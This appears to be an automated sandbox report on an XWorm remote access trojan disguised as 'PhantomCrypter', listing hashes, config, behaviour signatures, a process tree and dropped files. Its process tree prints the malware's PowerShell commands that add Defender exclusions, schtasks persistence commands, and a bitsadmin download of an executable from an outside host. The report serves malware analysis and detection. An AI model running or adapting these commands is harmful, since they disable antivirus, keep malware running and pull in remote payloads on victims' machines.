Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-01-2025 15:10

General

  • Target

    PhantomCrypter/PhantomCrypter.exe

  • Size

    5.2MB

  • MD5

    e877adfe74b6bd2ad9b9f5c73f839152

  • SHA1

    ff73461cd1fc5d9755d8dfa135ed3f6401989d00

  • SHA256

    71e09355e41f28652a3749b8f109c75eb4e2b80fd2d3d651c420d6b1b73aaa96

  • SHA512

    7c0828a3e966dee6e93e8c6797068c1d4b27a9c1b88249381db6028d7ec18b282560a9e215da2f2c9841307c0f1732fea47983107fd606b850386e993f7431d1

  • SSDEEP

    98304:KUJgH4K+NsPeD9k/OYU2HkSBEIHFP2gH4KdBwgH/fkEihw:KUcT+NsPOkeLAVFXTdBwgH/Mr

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

fSptE7osVO19YSsZ

Attributes
  • Install_directory

    %AppData%

  • install_file

    msedge.exe

  • pastebin_url

    https://pastebin.com/raw/eZa6J63T

aes.plain
aes.plain
aes.plain
aes.plain

Signatures

  • Detect Xworm Payload 8 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 7 IoCs
  • Executes dropped EXE 12 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypter.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe
      "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3236
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:448
    • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe
      "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3540
      • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
        "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3076
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4348
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:464
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3536
        • C:\Windows\SysWOW64\bitsadmin.exe
          "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
          4⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:4280
      • C:\Users\Admin\AppData\Roaming\msedge.exe
        "C:\Users\Admin\AppData\Roaming\msedge.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5032
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1376
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5056
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3652
      • C:\Users\Admin\AppData\Roaming\OneDrive.exe
        "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4172
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3732
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4808
      • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
        "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4836
  • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
    "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2380
  • C:\Users\Admin\AppData\Local\msedge.exe
    C:\Users\Admin\AppData\Local\msedge.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:452
  • C:\ProgramData\OneDrive.exe
    C:\ProgramData\OneDrive.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4444
  • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
    "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4028
  • C:\Users\Admin\AppData\Local\msedge.exe
    C:\Users\Admin\AppData\Local\msedge.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1912
  • C:\ProgramData\OneDrive.exe
    C:\ProgramData\OneDrive.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3984

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    77d622bb1a5b250869a3238b9bc1402b

    SHA1

    d47f4003c2554b9dfc4c16f22460b331886b191b

    SHA256

    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

    SHA512

    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    d28a889fd956d5cb3accfbaf1143eb6f

    SHA1

    157ba54b365341f8ff06707d996b3635da8446f7

    SHA256

    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

    SHA512

    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    da5c82b0e070047f7377042d08093ff4

    SHA1

    89d05987cd60828cca516c5c40c18935c35e8bd3

    SHA256

    77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

    SHA512

    7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    badf20df5c58ac87d46ca34e9b5b9246

    SHA1

    3010c5bc16b9b3753eb98a52379a2c418d63a331

    SHA256

    4b4b0885a626b3c8ceebe5ee6e20d98bea46500bb8bb5f90c484f3cf69411fa8

    SHA512

    e227ab270d380ad7f78c08d60dd3cd9c8f713972939d3085fa03c762202759079453240a1dd22a206dcabb0c2b3bce1244e143251081b6dd25810bad75a57c89

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    36c0eb4cc9fdffc5d2d368d7231ad514

    SHA1

    ce52fda315ce5c60a0af506f87edb0c2b3fdebcc

    SHA256

    f6efe796606c4be6422dfd070d8c8e1bcda5852520633e3ef071541ff29f359b

    SHA512

    4ad7de3b286152386c4cfecb07d004d9ee3976c4e397d6a13b1ddee6524c4cb78b1c4bc9c2f984f321082f6ed6da2a2cd93f9954fd378b46f24fbf19bd15fb54

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    8ac2774493ffb4489983d3f6dc2a3241

    SHA1

    9a27e9ed279b3494f9964638cb0138f5ed3b7adf

    SHA256

    5055352f75e942b8cac302cef812b089a7172b7d327edda491c82343abda540f

    SHA512

    b8caac9024381da085f131652690eac73b469451f310c19c661f5cf11cea11175dd2be4209e6c9d39c82516769c7c5f29389650862f6ab35bd1b07a8f5a68a32

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    04114c0529b116bf66d764ff6a5a8fe3

    SHA1

    0caeff17d1b2190f76c9bf539105f6c40c92bd14

    SHA256

    fd7092b4e273314186bad6ce71aa4cd69450736b6ec6cc746868997ff82a7532

    SHA512

    6a718c330824346606ef24f71cca6be0bfafc626b1d2b060b36e919ab07f3d6a345f56cace8a5a84ffbe2183976eb197842c9fd2f3e3b8c8dd307057d59d6f26

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe

    Filesize

    5.0MB

    MD5

    d4d28f2c6fd9af9ee5a3be30f9ab913b

    SHA1

    be4264bceaff957ff799b73ebc2479f0fc794815

    SHA256

    c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

    SHA512

    7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe

    Filesize

    165KB

    MD5

    8c92b315d88907a31ad9eaa934a60660

    SHA1

    89c26c8a1f5b2db85e628a6526c9431e7febe5f8

    SHA256

    bea75b57f940b13d5bfcb05a0c3ae1def9d2d25f6c3115fc7b2bf85232175672

    SHA512

    b294fd15ac63bbd7cfd444c9df5a03c7bce8bc98d2b2d2011e5290638fba689ff083260ed60688cc4b0a0a59299dda0b1cc09ba8f63daf92efbeeaed604ebfc2

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1bhhz4o.uxf.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Chrome Update.exe

    Filesize

    152KB

    MD5

    16cdd301591c6af35a03cd18caee2e59

    SHA1

    92c6575b57eac309c8664d4ac76d87f2906e8ef3

    SHA256

    11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

    SHA512

    a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

  • C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

    Filesize

    844B

    MD5

    3f8a283abe6fe28a7d217c8105041426

    SHA1

    0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

    SHA256

    333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

    SHA512

    bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

    Filesize

    766B

    MD5

    08d2821f832d244bca3257ece7eae2d4

    SHA1

    b1c241b6afce537d817656d7a5992fdfef5cb2ba

    SHA256

    48b5f42933ab1da12b933d361679334050e34dd5e787ff2d3942b82f8f3fcc75

    SHA512

    8ef298e6058e490845675e0b6ce3e7ef0b6cebe91243ff400b09e73ccf80ec1f3c59c6f9c98aef4a2dc0fd581a257844514078150891447b8e7e845b9fd207e9

  • C:\Users\Admin\AppData\Roaming\OneDrive.exe

    Filesize

    140KB

    MD5

    a1cd6f4a3a37ed83515aa4752f98eb1d

    SHA1

    7f787c8d72787d8d130b4788b006b799167d1802

    SHA256

    5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

    SHA512

    9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

  • C:\Users\Admin\AppData\Roaming\TOPHERC.exe

    Filesize

    4.2MB

    MD5

    79f2fd33a188ff47216b4f4dd4552582

    SHA1

    16e40e0a1fed903fec20cd6cd600e3a2548881ad

    SHA256

    cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

    SHA512

    caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

  • C:\Users\Admin\AppData\Roaming\msedge.exe

    Filesize

    166KB

    MD5

    aee20d80f94ae0885bb2cabadb78efc9

    SHA1

    1e82eba032fcb0b89e1fdf937a79133a5057d0a1

    SHA256

    498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

    SHA512

    3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

  • memory/116-91-0x00000265C6570000-0x00000265C6592000-memory.dmp

    Filesize

    136KB

  • memory/3540-80-0x00007FF897550000-0x00007FF898011000-memory.dmp

    Filesize

    10.8MB

  • memory/3540-27-0x00007FF897550000-0x00007FF898011000-memory.dmp

    Filesize

    10.8MB

  • memory/3540-28-0x0000000000590000-0x0000000000A98000-memory.dmp

    Filesize

    5.0MB

  • memory/3880-15-0x00007FF897550000-0x00007FF898011000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-262-0x00007FF897550000-0x00007FF898011000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-275-0x00007FF897550000-0x00007FF898011000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-274-0x00007FF897550000-0x00007FF898011000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-13-0x00000000005D0000-0x00000000005FE000-memory.dmp

    Filesize

    184KB

  • memory/3952-50-0x0000000000B50000-0x0000000000B7C000-memory.dmp

    Filesize

    176KB

  • memory/4048-66-0x00000000004F0000-0x0000000000518000-memory.dmp

    Filesize

    160KB

  • memory/4816-1-0x0000000000010000-0x0000000000546000-memory.dmp

    Filesize

    5.2MB

  • memory/4816-0-0x00007FF897553000-0x00007FF897555000-memory.dmp

    Filesize

    8KB

  • memory/4836-84-0x0000000005C80000-0x0000000005D1C000-memory.dmp

    Filesize

    624KB

  • memory/4836-81-0x0000000000CD0000-0x0000000001108000-memory.dmp

    Filesize

    4.2MB

  • memory/4836-82-0x0000000006190000-0x0000000006734000-memory.dmp

    Filesize

    5.6MB

  • memory/4836-83-0x0000000005AE0000-0x0000000005B72000-memory.dmp

    Filesize

    584KB

  • memory/4836-85-0x0000000005B90000-0x0000000005B9A000-memory.dmp

    Filesize

    40KB

  • memory/5032-65-0x0000000000F90000-0x0000000000FBE000-memory.dmp

    Filesize

    184KB